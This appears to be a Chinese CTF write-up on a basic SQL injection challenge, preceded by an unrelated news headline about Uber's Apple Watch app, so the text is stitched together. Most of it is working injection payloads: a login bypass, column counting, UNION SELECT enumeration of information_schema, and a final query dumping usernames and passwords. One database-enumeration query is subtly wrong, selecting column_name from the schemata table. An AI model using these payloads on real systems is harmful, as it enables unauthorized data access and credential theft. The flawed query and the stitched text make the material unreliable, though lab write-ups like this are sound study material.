Uber 優步的蘋果 Apple Watch 版 App 停止支援,無法再通過手錶打車
一道基礎的SQL注入題目
筆記:
爆破資料庫:union select 1,2,group_concat(column_name) from information_schema.schemata%23
爆破錶名 :union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='資料庫名字'%23
爆破欄位名:union select 1,2,group_concat(column_name) from information_schema.columns where table_name='資料表名'%23
首先進入到頁面,看到輸入使用者名稱密碼,直接一個萬能密碼得到使用者名稱admin密碼是一串md5加密的資料,可以嘗試md5碰撞,但我試了沒對
那就老老實實的sql注入,先嚐試是單引號還是雙引號註釋(user是單引號,用password是雙引號)
構造order by語句:username=admin‘ order by 3%23&password=1(因為是輸入在url上,所以不能直接輸#)
輸入4就報錯,所以只有三個注入點,用username=1' union select 1,2,3%23&password=1得知注入點的位置在2,3
然後就爆破庫:?username=1' union select 1,2,group_concat(column_name) from information_schema.schemata%23&
爆破錶:?username=1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'%23&password=1
欄位:?username=1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1
然後直接:?username=1'union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1